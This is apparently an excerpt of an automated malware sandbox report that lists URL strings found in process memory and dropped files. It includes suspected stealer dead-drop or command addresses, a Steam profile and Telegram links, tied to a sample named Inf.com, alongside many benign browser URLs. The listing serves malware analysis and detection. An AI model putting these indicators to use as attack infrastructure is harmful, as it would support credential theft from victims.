                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3394790116.00007CC800194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                    Source: chrome.exe, 00000020.00000003.3179742032.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175094763.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3184755862.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175834331.00005B3802EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178580186.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                    Source: chrome.exe, 00000020.00000003.3158863745.00007BD4006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                    Source: chrome.exe, 00000020.00000003.3158863745.00007BD4006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                    Source: msedge.exe, 00000022.00000002.3394790116.00007CC800194000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                    Source: chrome.exe, 00000020.00000003.3154675597.00000370002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3154712351.00000370002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                    Source: chrome.exe, 00000020.00000003.3171733569.00005B38026D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3393251696.00007CC800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json.35.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                    Source: powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: chrome.exe, 00000020.00000003.3216131838.00005B3803540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                    Source: manifest.json.35.drString found in binary or memory: https://docs.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-autopush.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-preprod.corp.google.com/
                    Source: manifest.json.35.drString found in binary or memory: https://drive-staging.corp.google.com/
                    Source: chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                    Source: manifest.json.35.drString found in binary or memory: https://drive.google.com/
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabk
                    Source: chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 0000000D.00000003.2471783618.0000027D1CEC0000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000009.00000002.2406464503.0000025482DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 00000020.00000003.3159228813.00007BD4006E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                    Source: msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                    Source: chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                    Source: chrome.exe, 00000020.00000003.3158474987.00007BD40039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                    Source: chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                    Source: chrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                    Source: chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                    Source: chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                    Source: chrome.exe, 00000020.00000003.3159324618.00007BD4006EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                    Source: chrome.exe, 00000020.00000003.3158268076.00007BD400390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                    Source: chrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                    Source: msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                    Source: msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                    Source: chrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                    Source: 000003.log1.35.drString found in binary or memory: https://ntp.msn.com/
                    Source: Session_13379753467228388.35.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                    Source: powershell.exe, 00000003.00000002.2227793598.0000012290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025483B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.0000025492344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                    Source: chrome.exe, 00000020.00000003.3221967895.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                    Source: chrome.exe, 00000020.00000003.3221916523.00005B38030C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3201287944.00005B3800B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                    Source: chrome.exe, 00000020.00000003.3178651533.00005B3803140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                    Source: msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                    Source: chrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                    Source: chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                    Source: chrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                    Source: chrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                    Source: Inf.com, 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                    Source: Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                    Source: Inf.com, 0000001A.00000003.2971341246.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971644605.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971377296.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                    Source: Inf.com, 0000001A.00000002.3399025442.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                    Source: Inf.com, 0000001A.00000002.3399025442.0000000000F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/:
                    Source: Inf.com, 0000001A.00000003.2971341246.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971644605.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971377296.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                    Source: Inf.com, 0000001A.00000002.3399642735.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971580019.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000422D000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971521152.0000000003F86000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971737900.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3399642735.000000000103F000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3399122484.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                    Source: Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                    Source: Inf.com, 0000001A.00000002.3399642735.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3405131990.000000000422D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Inf.com.15.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chrome.exe, 00000020.00000003.3199988723.00005B38030C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                    Source: Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3227248252.00005B38030C4000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
